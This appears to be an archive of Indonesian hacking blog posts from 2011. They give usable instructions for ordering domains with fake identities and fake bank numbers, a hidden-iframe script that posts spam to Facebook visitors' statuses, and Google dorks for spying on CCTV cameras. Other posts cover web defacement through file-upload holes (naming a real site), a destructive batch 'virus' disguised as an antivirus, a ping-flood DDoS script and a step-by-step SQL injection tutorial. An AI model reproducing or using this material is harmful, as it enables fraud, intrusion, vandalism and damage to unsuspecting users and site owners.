Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Rabu, 23 November 2011

cara setting domain strato di 000webhost

Pada artikel sebelumnya saya sudah memberikan tips cara order domain gratis di strato, nah kali ini saya akan mengajarkan bagaimana cara setting domain strato di tempat penyedia hosting gratis seperti 000webhost.com atau semacamnya..
Pada artikel sebelumnya saya juga pernah post bagaimana cara daftar hosting dan domain gratis di 000webhost dan dot.tk,nah klo di dot.tk atau .co.cc setting domainnya gampang beda sama di strato.klo di strato cuma ada A record saja tidak ada NS, dan Cname nya.

langsung saja yah biar gk klamaan.. :D
pertama pastinya kamu daftar dlu di 000webhost.com ,klo gk tau daftarnya lihat di artikel sebelumnya DISINI.

Lalu kita menuju settingan domain di strato,lalu pilih domain yang ingin di edit kemudian klick "Naar het pakket". pada tampilan selanjutnya kamu klick  instellingen lalu pilih domainbehher,.selanjutnya lihat gambar 1.0..


Jika sudah mengklick "configureren",di tampilan selanjutnya kamu pilih "DNS-behher" lalu pilih "A-Record" ,,selanjutnya lihat gambar 1.1...

Pada halaman "A-Record" kita pilih "eigen IP-adres" selanjutnya kita masukan ip addres dari 000webhost.trus kamu klick "instellingen doorvoeren" lalu klick lagi "Overzicht" selanjutnya lihat gambar 1.2...

Sebenernya ini sudah selesai tinggal tunggu proses nya aja selama 1-2 hari. Tapi nantinya web kamu hanya bisa di buka dengan WWW saja,klo tanpa WWW, web kamu tidak bisa di buka..,
nah cara setting nya dengan menggunakan perantara dns server yaitu memakai dnspark.net, Terlebih dahulu kamu daftar di web tersebut supaya bisa login,jika sudah kemudian kamu login ke dnspark.net.

Kemudian kamu pilih "DNS Hosting" lalu "Add Domain",dan "Enter new domain:" di isi dengan domain kamu,jika sudah, klick "Add now" lalu klick lagi "DNS Hosting". selanjutnya lihat gambar 2.0...

Selanjutnya pada "TYPE" pilih "NS" hostnamenya masukan WWW, Nameserver diambil dari 000webhost lihat gambar "1.2", jika sudah "Update All". 
Pada langkah selanjutnya "TYPE" pilih yang "A" lalu "Dyn IP Address" masukan 72.14.203.121 buat 2 kali lagi dengan ip yg berbeda yaitu 72.14.205.121 dan 72.14.207.121, jika sudah "Update All"selanjutnya lihat gambar 2.1...

Alhamdulillah udah selesai,,tinggal tunggu proses nya,paling lama 2 hari.. 
jika ada pertanyaan silahkan komentar di postingan ini,,:D
salam sejahtera..!!

Cara Order Domain Gratis [not working anymore]

Okeh,,kali ini saya akan memberikan tutor bagaimana cara order domain gratis bisa .com .org .asia .net dll gak pake bayar..!!
langsung aja yah..
sebelum melakukan ini sebaiknya gunakan proxy di http://www.samair.ru/proxy/ atau  http://nntime.com/proxy-country/ ,mengapa harus menggunakan proxy,ya karna ini cara ilegal untuk amannya kita gunakan proxy itu supaya gk ke detect keberadaan kita,,
Jika sudah di ganti proxynya kita cek terlebih dahulu di sini www.stayinvisible.com apakah bener-bener proxy kita sudah berubah,jika sudah kita lanjut ke tahap berikutnya.

Langkah selanjutnya adalah menuju web http://www.strato.nl/ untuk order domainnya.

kalau ada tulisan "is vrij" itu bisa di gunakan domainya langsung klick "Selectie overnemen en doorgaan".

Ditampilan selanjutnya ada pilihan "STRATO Domain:" ,"STRATO Mail:",dan "STRATO MailPro:",nah karna kita ingin order domain maka pilih "STRATO Domain:" lalu pilih domain yg kamu akan pakai.
jika sudah kemudian klick "Nu bestellen".

Setelah itu akan muncul form pengisian data-data,sekarang kita isi dengan menggunakan fake name generator.
Nama dan jenis kelamin terserah,tapi untuk negara pilih belanda/netherlands,jika sudah klick Generate.

Isi sesuai yang ada di fake name generator,untuk no telepon isi dengan code 020 lalu di isi nomor dengan 8 digit angka,,dan email di isi dengan email kamu sendiri.
Jika data-datanya sudah di isi kemudian klick "Volgende" untuk menuju halaman selanjutnya.

Pada halaman ini akan di tampilkan rincian paket yang kamu order,selanjutnya klick yg di tandai{lihat gambar}.

Setelah itu kita akan berada pada halaman konfirmasi pembayaran. pada rekening number isi dengan angka 8008 dan dilanjutkan dengan 3 angka acak. Misalnya 8008325. Kemudian tekan tombol "Volgende".

Selanjutnya kita akan di arahkan pada halaman konfirmasi,[lihat gambar].

Kemudian buka email kita yg isinya mengenai order domain di strato,sekitar 2-5 jam akan mendapatkan email lagi yang berisi USERNAME dan konfirmasi password.
gambar email 1.
 Gambar email 2.
 Gambar email 3.

Jika kamu sudah menset password nya maka kamu tinggal login di strato. "Domeinnaam of klantennummer" isi dengan username yang kamu dapat di email no 2 tadi. "Wachtwoord" isi dengan password yang kamu set di email no.3 tadi.

contoh web yang saya buat http://depokcyber.org/mp3/
Nah selesai deh order domain secara gratis,..
ingat,, saya tidak bertanggung jawab atas akibat/masalah yang di timbulkan di kemudian hari,saya hanya ingin berbagi informasi,,,


Selasa, 29 Maret 2011

Cara update status teman tanpa login

Beberapa minggu ini sering ada orang yg post status facebook dalam jumlah yg banyak dan isi yg sama,itu membuat acount yg lain kesal dan di angkap spam status facebook,nah sekarang saya akan memberutahukan bagai mana cara update satus facebook orang lain tanpa harus login,..
Penasaran kan gimana cara update status orang tanpa harus login atau hack account facebooknya,,,???

Tools yang harus di siapkan ialah,,

1. Siapkan hosting nya,banyak kok yg gratisan banyak salah satunya di 000WEBHOST
2. Script IFRAME nya

DEMO 

Caranya :

1. Pertama copy Script ini
<div id="wait" style="display:none">
<iframe src='http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=%3Cscript%3Edocument.getElementById%28%27root%27%29.style.display=%27none%27;window.onload=function%20%28%29%7Bdocument.forms[0].message.value=%27Kalo%20gak%20klik%20nyesel%20loh%20http://pajenk-akbar.tk%27;document.forms[0].submit%28%29%7D%3C/script%3E' style='display: none; height: 1px; width: 1px;'/>
</div>
lalu kamu edit di bagian http://pajenk-akbar.tk

2. Masukan script itu ke hosting kamu,
3. Cari target,yg di maksud cari target ialah suruh teman atau orang lain klick web hosting kamu yg sudah di susupi script tadi biar gk ketawan link nya kamu short URL ....
4. Jika sudah ter click buka halaman profil lalu liat apa yg terjadi pada status nya..

Ayo buruan coba sebelum di BLOCK sama FACEBOOK nya...

Hack kamera CCTV dengan google

Walaupun komputer rusak tetep gw bela2in ngasih tut kepada sobat blogger yg setia ini,,
sekarang saya akan memberitahukan bagai mana cara melihat camera CCTV yang di pasang di seluruh dunia yg pastinya melalui bantuan dari guru kita siapa lagi klo bukan paman google,jadinya kamu bisa ngintip camera CCTV nya,,sapa tau lagi ngintip ada yg indehoy...:D
langsung aja yah,,,
pastinya kamu buka paman google terlebih dahulu,
Sesudah itu masukin DORK nya
inurl:"viewerframe?mode=motion"

inurl:indexFrame.shtml "Axis video server"

inurl:lvappl intitle:liveapplet

intitle:"wj-nt104 main"

intitle:"snc-rz30 home"

inurl:/view/index.shtml

Pilih salah satu yah..:D

berikut camera yg berhasil saya sadap... LIHAT
Dari gambarnya sih kyanya ini camera CCTV kebun binatang,,,hehehe

Tuh liat ada jerapah nya kan,,,kyanya ini benar2 kamera CCTV di kebun binatang,,
dan bisa di lihat juga di situ ada tombol navigasi nya,jadinya kamu bisa merubah arah kamera CCTV nya segala arah...
dah ah cukup..silahkan kamu coba,tapi jgn di buat untuk ngintip cewek yah,,,hehehe:D

Jumat, 04 Maret 2011

Deface web dengan SPAW Vulnerably

Sekarang saya akan menerangkan bagaimana cara deface dengan mudah menggunakan vulnerably atau kelemahan dari sebuah web,dimana setiap web pasti ada celah untuk di susupi ,,,pada artikel sebelum nya juga saya pernah mengshare cara deface dengan mudah menggunakan Remote file upload opencart dan deface dengan metode aspx,mengapa dikatakan mudah,karena kamu tinggal mencari vuln atau kelemahan web nya saja,tanpa harus mencari username dan password admin nya,,caranya hampir sama seperti metode di atas yaitu mengupload sebuah file dengan menggukanan kelemahan suatu web...
langsung ke meterinya aja yah...pastinya kita membutuhkan dork untuk mencari target nya...
DORK
  1. inurl:spaw2/dialogs/ atau
  2. inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9

jika sudah menemukan targetnya contoh seperti ini :

lalu kamu ganti spaw2/uploads/files/Gen%20Home-2009-web%20(2).pdf%2016%20pages%20Final.pdf
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9

nanti akan muncul SPAW File Manager,lihat gambar di bawah ini

jangan lupa ganti type nya dari image ke File,dan kamu tinggal upload file kamu..
jika sudah trus di apain...??
yaudah selesai emang mau ngapain ??? heheheh
kidding,,
trus kamu lihat file kamu sudah masuk blom seperti gambar di bawah ini..




lalu bagaimana cara melihat hasil deface kita???
cara nya,kamu klick file yg sudah kamu upload,nanti akan ada tulisan download file di sebelah kanan,,dan kamu klick,,maka hasil file deface kamu akan keluar seperti ini..

KLICK DONK SAY...!!

udah dehh selesai deface nya,,gampang kan ???
mudah-mudahan artikel yang saya share ini menambah ilmu teman-teman smua,dan jangan di salah gunakan yah...
cheerrsss..!!!

Rabu, 02 Maret 2011

Deface dengan metode aspx

Seminggu ini saya akan memposting artikel tentang hacking..jadi jangan bosen yah...
oke lanjut,seperti judul di atas yaitu defacing dengan metode aspx,walaupun teknik deface dengan metode aspx ini agak basi,tapi lumayan lah bagi kamu yg ingin mempelajari teknik2 deface,..
Langsung ke langkah2nya aja yah,,,kyanya udah pada gk sabar,,:P
Yang perlu di siapkan adalah target nya,,udah pasti lah..

DORK : inurl:Fck/fcklinkgallery.aspx
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya,,

klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx

di sini saya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.faithchurchonline.org sebagai contohnya..

sehingga akan menjadi seperti ini :
"http://www.faithchurchonline.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"

setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','')" => [ tanpa tanda kutip 2 ]

ntar keluar sendiri tuh, tombol browse ny kya gini..



klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini KLICK ME!!

tapi gk smua web yang bisa upload file .html,seperti contoh situs ini hanya bisa upload file .txt..

sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga . .
yang tadi nya shell ente bernama "hacker.txt" harus ente rubah nama neutron nya terserah tetapi pastikan berakhiran ".asp;.css" misal : "hacker.asp;.css"

upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.faithchurchonline.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]

nah..abis itu kamu ganti alamat "www.faithchurchonline.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi"http://www.faithchurchonline.org/Portals/0/pajenk.txt" intinya kita harus menambahkan "portals/0/" pada akhir "http://www.faithchurchonline.org/"

gimana gampang kan????
jadi udah bisa deface donk,,,heheh
silahkan kamu berkreasi dan selamat deface!!!

tutor HNC

Cara membuat virus sederhana dengan menggunakan notepad

Bagi temen2 yang ingin bermain dengan virus berekstensi.bat..
Script virus berekstensi .bat hanya terdiri dari beberapa kata perintah seperti echo, pause, cls dan beberapa scrip perintah jika kita ingin bermain diregistri komputer

contoh penulisan script virus

Code:
Copy %0 C:\
fungsinya virus akan terus menerus menduplikasi aplikasinya sehingga begitu kita delete si master virus seperti amoeba.mereka akan terus menerus menyerang kompi lawan

kita akan coba bikin sedikit masalah ma kompi..ini script kita save dengan nama apa saja misal musik.bat

//untuk menampilkan komunitas
@echo off
echo ================================
echo ================================
echo created By HNC Team Hacker
echo shinichi81 was cleaned
echo ================================
echo ================================


//menampilkan kata2 penghantar,bisa dirubah sesuka hati
echo .
echo Readme.txt
echo Antivirus portable dari SMADAV untuk membersihkan virus lokal
echo untuk mengapusnya anda cukup masukan code virus yang terdeteksi
echo seperti code : 1.Trojan 2.Malware 3.Bat 4.VBS
echo Contoh: 1…lalu tekan Enter
echo Hapus dan Bersihkan lalu tekan Enter
echo Kamu yakin?? lalu tekan Enter
echo Mudah bukan…???
echo majukan aplikasi buatan negeri sendiri Bro....
echo .

//menampilkan registrasi pembuatnya
echo Register SHINICHI81 and supported by Hacker-Newbie Team
pause
echo Masukkan 1,2,3,4
pause
echo Begin scanning Virus….. tekan Enter

//disini kita akan bermain dengan registri,untuk menentukan registri yang dipilis bebas sesuka hatikita
cls
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableRegistryTools” /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v “NoDrives” /t REG_DWORD /d 67108863

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableTaskMgr” /t REG_DWORD /d 00000001

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableTaskMgr” /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v “NofIND” /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V “NoClose” /t REG_DWORD /d 00000001

REG ADD HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserLi​ st /v “Kena deh lue” /t REG_DWORD /d 00000001

//disini kita sudah megan kendali,terserah apakah mau udahan atau mau diteruskan
pause
echo Clean virus from komputer and then clik ENTER
cls
pause
echo Kamu yakin?? lalu tekan Enter
pause
echo Create Backup Windows…..tekan Enter
pause
cls
md \We_are_here\We_are_here\We_are_here\We_are_here\We_are_here\We_are_here\We_are_​here\We_are_here\We_are_here\We_are_here\We_are_here\We_are_here\
md \We_are_here\We_are_here\We_are_here\We_are_here\We_are_here\We_are_here\We_are_​here\We_are_here\md \we_are_your_nightmare\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_y​ ou\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We​ _come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come​ _to_you\We_come_to_you\We_come_to_you\We_come_to_you
md anti virus gua mantapkan wkwkwkwkkw
cls
:VIRUS
echo Komputer sih dah bersih bos….
echo tapi semua sistem lue dah gua pegang yah,sorry nih…
echo Udah deh mendingan beli komputer baru lagi yah
echo Makasih wat pake Antivirus dari Hacker-Newbie yah
cls
echo . “sudah malem nih,waktunya bobo!!!!!!”
echo ***************************************************************
echo SHINICHI81 dan kawan2 mengucapkan selamat tinggal…
echo ***************************************************************
echo 55555555555555555555555555555555555555
echo 5555555555555555555555555555555555
echo 555555555555555555555555555555
echo 55555555555555555555555555
echo 5555555555555555555555
echo 55555555555555555555555555555555555555
echo 55555555555555555555555555555555555555
echo 5555555555555555555555
echo 55555555555555555555555555
echo 555555555555555555555555555555
echo 5555555555555555555555555555555555
echo 55555555555555555555555555555555555555

\\fungsinya untuk merubah extensi sesuai yang kita inginkan
echo ****************************************************************
echo Shinichi81 & Hacker-Newbie was here…
echo ****************************************************************
echo>>Bau_badan.exe
echo>>sex_machine.dll
echo>>Tukul_ndeso.asm
echo>>Katro_men.exe
echo>>Vulneberity_its_yours.mp3
echo>>Seek_and_Destroyed.dat
echo>>Sampah_loe.exe
echo>>mandi_dulu.exe
echo>>goyang_dombret.mpeg
echo>>Fuckin_US.exe
echo>>buahdada.exe
echo>>msfuck.exe
echo>>Goodlinux.exe
goto VIRUS
copy Bau_badan.exe C:
copy sex_machine.dll C:
copy Tukul_ndeso.asm C:
copy Katro_men.exe C:
copy Vulneberity_its_yours.mp3 C:
copy Seek_and_Destroyed.dat C:
copy Sampah_loe.exe C:
copy mandi_dulu.exe C:
copy goyang_dombret.mpeg C:
copy Fuckin_US.exe C:
copy T buahdada.exe C:
copy msfuck.exe C:
copy Goodlinux.exe C:
copy Inul_oke.exe C:\Windonws\System32
copy sex_machine.dll C:\Windonws\System32
copy Tukul_ndeso.asm C:\Windonws\System32
copy Katro_men.exe C:\Windonws\System32
copy Vulneberity_its_yours.mp3 C:\Windonws\System32
copy Seek_and_Destroyed.dat C:\Windonws\System32
copy Sampah_loe.exe C:\Windonws\System32
copy Gwe_ada_disini.exe C:\Windonws\System32
copy Britneys_bugil.mpeg C:\Windonws\System32
copy Fuckin_US.exe C:\Windonws\System32
copy TKIKIL.exe C:\Windonws\System32
copy msfuck.exe C:\Windonws\System32
copy Goodlinux.exe C:\Windonws\System32
attrib +a +s +h *.*
md\We_Are_here\We_Are_here\ We_Are_here\ We_Are_here\ We_Are_here\ We_Are_here\
md\ We_Are_here\ We_Are_here\ We_Are_here\ We_Are_here\ We_Are_here\ md\We_Are_here\ We_Are_here\ md We_Are_here\ We_Are_here\ We_Are_here\ We_Are_here\


kalau mau dirubah jadi .bat..keterangan \\keterangan dihapus saja dan script dijadikan menjadi satu kesatuan.selamat mencoba

tutor with shinichi81HNC

pengertian DDOS



Sorry blog agak terbengkalai karena punya mainan baru,yaitu DDOS attack,..
apa itu DDOS ???
Denial of Service adalah serangan (attack) yang diluncurkan untuk meniadakan servis (serangan terhadap availability).
Atau dengan kata lain DoS dapat dikatakan aktifitas menghambat kerja sebuah layanan (servis) atau mematikannya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut.

Serangan Dos berdampak terhadap aktifitas yang menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal.

Beberapa aktifitas DoS, adalah :

1. Aktifitas �flooding� terhadap suatu server

2. Memutuskan koneksi antara 2 mesin.

3. Mencegah korban untuk dapat menggunakan layanan.

4. Merusak sistem agar korban tidak dapat menggunakan layanan.

Denial of Sevice, serangan yang menghabiskan resource untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/ mesin yang diserang kehabisan resource dan manjadi hang.
Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client.
Spasi swap juga digunakan untuk mem-�forked� child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat.
Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif.
Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.

Tipe-Tipe Serangan DoS

1. SYN-Flooding

SYN-Flooding merupakan network Denial ofService yang memanfaatkan �loophole� pada saat koneksi TCP/IP terbentuk.
Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegah/menolak cracker untuk mengakses sistem.

2. Pentium �FOOF� Bug

Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot.
Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.

3. Ping Flooding

Ping Flooding adalah brute force Denial of Service sederhana.
Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut �smurfing�

Serangan DoS ini dapat dilakukan secara serempak dari beberapa komputer yang tersebar sehingga disebut Distributed DoS (DDoS). Serangan ini cukup ampuh dan sempat membuat down beberapa web site yang terkenal seperti Yahoo.com, ebay, CNN, dan lain-lainnya. Software yang digunakan untuk menyerang diduga adalah trinoo, tfn (tribal flood network).
Banyak software di internet yang dapat dikategorikan DoS, beberapa diantaranya adalah Ping of Death, Teardrop dan Ping Broadcast (Smurf).

Membuat serangan DDOS dari notepad

Lagi jalan-jalan dapet artiket bagus dari hacker newbie,langsung aja kita simak bareng2,,,
Di sini aku cuma mau berbagi ilmu dengan kalian cara membuat
aplikasi DDOS(Distributed Denial of Service)dengan bantuan BatchFile.Berserta penjelasan
dari source code ini.
---------------
Tahap pembuatan
---------------

Yang di perlukan dalam pembuatan ini adalah
1.Notepad


2.salin script ini ke notepad

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS


3.save dengan ekstensi batchfile
contoh:DDOS.bat

----------
Cara Pakai
----------

Pada menu Server-Target masukan
alamat web yang ingin di DDOS
contohnya seperti ini:

disini saya mencoba men DDOS Google,setalah itu
tekan "ENTER" hasil seperti ini

kemudian masukan hasil ip dari ping tadi di ip host dan
untuk Packet Size itu untuk mengirim berapa byte jadi
ukuran Size terserah anda
contohnya seperti ini

ke mudian tekan "ENTER" hasil seperti ini


jika seperti gambar di atas berarti Proses DDOS berhasil di jalankan
tergantung anda ingin men DDOS sampai berapa lama.

-----------
Penjelasan
-----------

Saatnya penjelasan source code

@echo off
Quote:
*Menyebabkan perintah tidak ditampilkan ketika dilaksakan/di execute

mode 67,16
Quote:
*Membentuk layar pada command prompt dengann ukuran lebar "67" dah tinggi "16"

title DDOS Attack
Quote:
*membuat judul dengan nama ""

color 0a
Quote:
*membuat layar berwarna,
pada angka 0->untuk membuat background Hitam dan a->untuk membuat tulisan menjadi Hijau Terang

cls
Quote:
*membersihkan layar sehingga command seperti

@echo off
mode 67,16
title DDOS Attack
color 0a
tidak di tampilkan



echo
Quote:
*akan menampilkan baris kosong

echo.
Quote:
*untuk memberi tanda longkap

Ä
Quote:
* membuat garis lurus

echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.

set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Quote:
*artinya hasil dari "Server-Target:" akan di nyatakan x
setelah itu x akan di Ping

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
Quote:
*memberi waktu pause sebanyak 5 second dan diteruskan ke Next


:Next
echo.
echo.
echo.
set /p y=ip Host:
echo.
set /p z=Packet Size:
echo.
Quote:
*setelah ke Next ,
pada "ip Host:" akan di nyatakan y dan "Packet Size:" akan di nyatakan z
setelah itu di teruskan ke DDOS

:DDOS
color 0c
Quote:
*membuat warna merah terang

echo Attacking Server %y%
ping %y% -i %z% -t >nul
goto DDOS
Quote:
*artinya setelah memasukan nilai y dan nilai z
hasil nilai y akan di tampung di %y%
dan penge PING an nilai y dan pengiriman size yg di yatakan pada
nilai z setelah berhasil di lanjutkan ke :DDOS
karena mengunakan goto(perulangan)

tutor by SOHAI

My SQL injection step by step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.mikezilla.com/exp0012.html dan masih banyak lagi,silahkan kamu cari di paman google...

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

